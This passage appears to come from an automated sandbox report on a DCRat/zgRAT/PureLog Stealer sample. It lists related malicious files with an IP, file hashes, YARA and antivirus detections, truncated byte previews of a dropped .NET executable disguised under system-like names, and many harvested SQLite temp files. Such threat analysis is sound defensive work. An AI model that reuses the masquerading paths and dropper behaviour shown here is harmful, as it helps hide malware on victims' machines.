	T05Dk6G8fg.exe	Get hash	malicious	Unknown	Browse	89.23.100.233
	3K5MXGVOJE.exe	Get hash	malicious	Unknown	Browse	89.23.100.233
	VaXmr82RIb.exe	Get hash	malicious	Unknown	Browse	89.23.100.233

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Desktop\AtVzwBvZ.log	DWTukBG9R7.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	CPNSQusnwC.exe	Get hash	malicious	DCRat	Browse
	xoCq1tvPcm.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	Dfim58cp4J.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	eu6OEBpBCI.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	IYXE4Uz61k.exe	Get hash	malicious	DCRat, PureLog Stealer, Xmrig, zgRAT	Browse
	file.exe	Get hash	malicious	Amadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, Vidar	Browse
	gorkmTnChA.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	file.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	file.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse

Created / dropped Files

C:\Program Files\Common Files\81eb946674e99f

Download File

Process:	C:\providerBrowserruntimeCrt\Providerbroker.exe
File Type:	ASCII text, with very long lines (852), with no line terminators
Category:	dropped
Size (bytes):	852
Entropy (8bit):	5.927964852103274
Encrypted:	false
SSDEEP:	24:GA6c/oQGdEgOv+bTps/Va1qzAdqEBGH/UT:kQzvsTF1rdy/k
MD5:	EEE9598E5786A00FABC8F16AEE669020
SHA1:	0F8869572E6C1D24B62DEBC9903CE99986A9EDAE
SHA-256:	313D8C70A4A54BCE3C60CF30ACEA94691B5AF7E0B4877A47463DDC594D460609
SHA-512:	CFC79C865102D04990B39A95E83A73CBEC037E0B909C1F441DC747B4D092A3B6F7F7EF71EE064C6A53295192A02A51A04F8E0C2CF19767424F359C26C9443944
Malicious:	false
Reputation:	low
Preview:	TDpYdcwS4BblIuBMynoq8EJqC8gTuVnDtxaGPNSfEQHHOTd1NzkgWa1O48Vf6chiXX1UT56kUJms7CctepG4uHqT6LLQ1xiltiu0bIhR2ALNxJR2gmAQWmyQriYItqshkA9YRlRVIyBt5dfw3TtPxSPGudJ3tYiMRonwK3k4VoIhlEUNCmOZ6dtSv3nxcYmtQybR0smAtz4IJrfqJ51HJIQy4UBQPwc6CYRwmCXT9NqGilIDY7oggekHinWfrVv7W7FvasEHihI5cJPTM82SH6ZiyJO8p2mncsulfXnp2h89WopYXDSscdzahh6QeFbp5edtZoxyVNZk7aLKd0lmj3L93UE7aWKxFSE1K68tPdXODOcGVwxodzFBTe0Ej0Y8DmfoWU9h12WGg65o27lojfTQNDiqF4JZFYLbtxuBxPxlc9eXjMMmOuZhSObTvTc7t6AHud4FMk0UsrxOiLH2rgLV8oIfVbPew02g8XmFRHZo3FzlaNvkLjPMvpIGUZtvUWh1zRPKjBljHhc3zhEIqpSNkpuTOgv2YnTgi7vJ7kBK8pEONPRwUkFoEUQJg66CPsLdN5V1v5LGoHO5lgF9P8hxipbOqmmAo84PelAR4ZAZZ9A6FVi917xRKX5idHLJSLbqN9b9fxFz7IYjofJUDmJrKnEGqcywO1GOhUtF4ieD18TC9V3880FpBufj4UTD9SlGBKBUvDZfIFzMTCHUizyXvbMwyKLkPaDjWNAyTjN4akh55SP1N9fKdOVk8Pfl1zQsCP0GBSA9m46K3Q0g4TWP52GI1a0EDlClUz3qcIz48fijRKqrY9rhcAwJJrOlc65A1V0EXKDvebRZUh0r

C:\Program Files\Common Files\BSlvAOjamepaXWJMhY.exe

Download File

Process:	C:\providerBrowserruntimeCrt\Providerbroker.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	10393088
Entropy (8bit):	3.7593823756442295
Encrypted:	false
SSDEEP:	98304:w4nrXaOTm08kwmLyo/0YwWXWkcftzkmaGHBXRaLWUJDCU:w4rXbm08oLSYwuWkcfCmPXRaLLVCU
MD5:	ADAE028E0A5A72D219A02BB06D92241A
SHA1:	7CAE683F773D541BD5C76CE6491CCB2F2F05C08A
SHA-256:	3AC51E8FC3AA517AEA4640EFAFFA1B04301C14DC876104E09AB9B7A3A95A0415
SHA-512:	FE8EF741DE45A6BDE2B48322EF33EE9662B0CBC4CAABB582F405850CB0AB58D286E96C5E28E47A0968B17BAE6874F938973D6ED7F27E6A9DB3A16ED0B63AA1E6
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Common Files\BSlvAOjamepaXWJMhY.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Common Files\BSlvAOjamepaXWJMhY.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................j;...........;.. ....;...@.. ........................;...........@...................................;.K.....;.p.....................;...................................................... ............... ..H............text...4i;.. ...j;................. ..`.rsrc...p.....;......l;.............@....reloc........;......p;.............@..B..................;.....H.......4..........p.......7.0.\.;......................................0..........(.... ........8........E........9......)...8....(.... ....~....{....:....& ....8....(.... ....8....(.... ....~....{....9....& ....8........0.......... ........8........E........u...........P.......8....~....(G... .... .... ....s....~....(K....... ....~....{....:....& ....8.......... ....~....{e...9y...& ....8n.......~....(O...~....(S... ....<.... ....~....{e...98...& ....8-...r...ps....z*8..

C:\Program Files\Windows Photo Viewer\en-GB\81eb946674e99f

Download File

Process:	C:\providerBrowserruntimeCrt\Providerbroker.exe
File Type:	ASCII text, with very long lines (634), with no line terminators
Category:	dropped
Size (bytes):	634
Entropy (8bit):	5.876892965863702
Encrypted:	false
SSDEEP:	12:EBlmNqL9ExjZLPU9u9dhxHWSmpqYpEJCO3MHz3ZCewiPng4tdiR3S2:i989L89uPXHVwl2JxMHz38eo4tci2
MD5:	16EEB0481C5CCF7FEA7C08A4C35DD42D
SHA1:	4DAEDB7A66B40C601A80A78AEDB549A40F71E69A
SHA-256:	9B12B0B3ED33380139C99B46DD38E65216B88B854990660C683762AACB075E86
SHA-512:	451DA5C919C22B2F7BAA9D97E8F1CB0677D915A9CB97A54129CF806F9E6A6F9D637997E607C5E72608BC34A78B523F54D3A61CBEFEB524B84F61036CE2286D23
Malicious:	false
Preview:	zjx4mtX86arqrU5JpiOFdRh7UxumxrgiezM67abNFBaMBSm4v3wMMAJiC0jz9vKO4JM1H8MPHA9c1U6BKz145TVdqo4G0lNU0LR1GuwwqhFLAqqr4hoJ4QTlysLdDFYfxplpDE4aDENXNJd97MMT7Eak2qCYjSslIjYVFBozmOFzC5XpOLg13FisPAxWCg0uVmPouI45iWqs8kh6TXJXw1rDBqFEORxGXVeaqt4GRkShYztpc0DoWc7d5LmECzrRikUnGHQkdDGLjJoM6alXOJu5XAfeG0Eb3B8yeGiVjcLTWw4vgaHlOTCZ0ZPFmvdm9pSiL0r01Qxv8bilGt8qscMj8j8E1dty9iTqeVkqsRt8gRbZ1n82xx4gcsjl2m8Yh9wZH2HuJR7bsODqHjNNe0ALoxOvv8xFSVagfBR8gOsfzcxNp3eSZv3q8kvTnW8Ld1JWxgLFROqQHfWL9AF2dfqgcui4P8VKPhB7SbaJrYBKEnidNkUnQFr8Lm4D8QzT3gAkdY2ik6LFdfcyLErpnr3K0CwqgWKaisRhn89zrwDU4mfpKG13jJpLn0ubmMCNwugvO4LNF281ojPNhGfZeQ1ZCF4xOiMetziJGtbP5oyrLxhEkg3gqmtf3H

C:\Program Files\Windows Photo Viewer\en-GB\BSlvAOjamepaXWJMhY.exe

Download File

Process:	C:\providerBrowserruntimeCrt\Providerbroker.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	10393088
Entropy (8bit):	3.7593823756442295
Encrypted:	false
SSDEEP:	98304:w4nrXaOTm08kwmLyo/0YwWXWkcftzkmaGHBXRaLWUJDCU:w4rXbm08oLSYwuWkcfCmPXRaLLVCU
MD5:	ADAE028E0A5A72D219A02BB06D92241A
SHA1:	7CAE683F773D541BD5C76CE6491CCB2F2F05C08A
SHA-256:	3AC51E8FC3AA517AEA4640EFAFFA1B04301C14DC876104E09AB9B7A3A95A0415
SHA-512:	FE8EF741DE45A6BDE2B48322EF33EE9662B0CBC4CAABB582F405850CB0AB58D286E96C5E28E47A0968B17BAE6874F938973D6ED7F27E6A9DB3A16ED0B63AA1E6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................j;...........;.. ....;...@.. ........................;...........@...................................;.K.....;.p.....................;...................................................... ............... ..H............text...4i;.. ...j;................. ..`.rsrc...p.....;......l;.............@....reloc........;......p;.............@..B..................;.....H.......4..........p.......7.0.\.;......................................0..........(.... ........8........E........9......)...8....(.... ....~....{....:....& ....8....(.... ....8....(.... ....~....{....9....& ....8........0.......... ........8........E........u...........P.......8....~....(G... .... .... ....s....~....(K....... ....~....{....:....& ....8.......... ....~....{e...9y...& ....8n.......~....(O...~....(S... ....<.... ....~....{e...98...& ....8-...r...ps....z*8..

C:\Recovery\6dd19aba3e2428

Download File

Process:	C:\providerBrowserruntimeCrt\Providerbroker.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	131
Entropy (8bit):	5.618938413877231
Encrypted:	false
SSDEEP:	3:kvvrlo2F1cIvNxiHB0AV7vvEbxPwcoVgzcEjOm9ZupUTAkPr:kvzl5KYW0A56xBoVhiupUz
MD5:	36E9A833398AE244D1744CBEF4130F1F
SHA1:	D10D05FA20FE9EC6BD8C63D14C3FFB862FF7465D
SHA-256:	C4CC092BC1A29EEBBB6ECE295920C819559F77242D6AAAF0FAF456F429345DF1
SHA-512:	0FF08577BFE78A4DD07109A0F0E9317324D4458B8EB03B3990BF7B1A42E79676EDDA1ABD4355490A6481BD1D37CBA909F41F1998DF0E42B882E554A452598586
Malicious:	false
Preview:	zAGHxoQezbJNOi0MsoqxHGCP9ASPgqSBqqrDeYF2aH3Du3ekKLQ19rAt80IxVB7JJHhi0wsTjxW9M9fGgsEVZaC9q8FnQSgZKt3mV6tXd6SLUAg8UCRm6mutFh11rEDQR7z

C:\Recovery\ApplicationFrameHost.exe

Download File

Process:	C:\providerBrowserruntimeCrt\Providerbroker.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	10393088
Entropy (8bit):	3.7593823756442295
Encrypted:	false
SSDEEP:	98304:w4nrXaOTm08kwmLyo/0YwWXWkcftzkmaGHBXRaLWUJDCU:w4rXbm08oLSYwuWkcfCmPXRaLLVCU
MD5:	ADAE028E0A5A72D219A02BB06D92241A
SHA1:	7CAE683F773D541BD5C76CE6491CCB2F2F05C08A
SHA-256:	3AC51E8FC3AA517AEA4640EFAFFA1B04301C14DC876104E09AB9B7A3A95A0415
SHA-512:	FE8EF741DE45A6BDE2B48322EF33EE9662B0CBC4CAABB582F405850CB0AB58D286E96C5E28E47A0968B17BAE6874F938973D6ED7F27E6A9DB3A16ED0B63AA1E6
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\ApplicationFrameHost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\ApplicationFrameHost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\ApplicationFrameHost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\ApplicationFrameHost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\ApplicationFrameHost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\ApplicationFrameHost.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................j;...........;.. ....;...@.. ........................;...........@...................................;.K.....;.p.....................;...................................................... ............... ..H............text...4i;.. ...j;................. ..`.rsrc...p.....;......l;.............@....reloc........;......p;.............@..B..................;.....H.......4..........p.......7.0.\.;......................................0..........(.... ........8........E........9......)...8....(.... ....~....{....:....& ....8....(.... ....8....(.... ....~....{....9....& ....8........0.......... ........8........E........u...........P.......8....~....(G... .... .... ....s....~....(K....... ....~....{....:....& ....8.......... ....~....{e...9y...& ....8n.......~....(O...~....(S... ....<.... ....~....{e...98...& ....8-...r...ps....z*8..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Providerbroker.exe.log

Download File

Process:	C:\providerBrowserruntimeCrt\Providerbroker.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1698
Entropy (8bit):	5.367720686892084
Encrypted:	false
SSDEEP:	48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4x:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4x
MD5:	2C0A3C5388C3FAAFA50C8FB701A28891
SHA1:	D75655E5C231DE60C96FD196658C429E155BEB0F
SHA-256:	A44CB861DDF882F48202B95D3A8A535419C1AE0386666C84B803F9810473EDD7
SHA-512:	0343301C34ED4FEB7EFF30186862EBC7446E6044955B3088B0BE0D86A3DACAE1BFC407A59D385E9CBB7A0DEF210DC3405FD442A598FD28431371E249F748258A
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

C:\Users\user\AppData\Local\Temp\0AZGjm1DVG

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\0MQKc7KiGj

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\0utajUt79J

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\0vZoyu6KAq

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\13Zf1YhPZa

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\16AUPbRbOS

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1OV5THlLD9

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1iRZHQm6nf

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1iXqJdRAFC

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1ssJIbrRP6

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\21JvKe3rrK

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\22aiUaCnhD

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\26SmL0rdKX

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
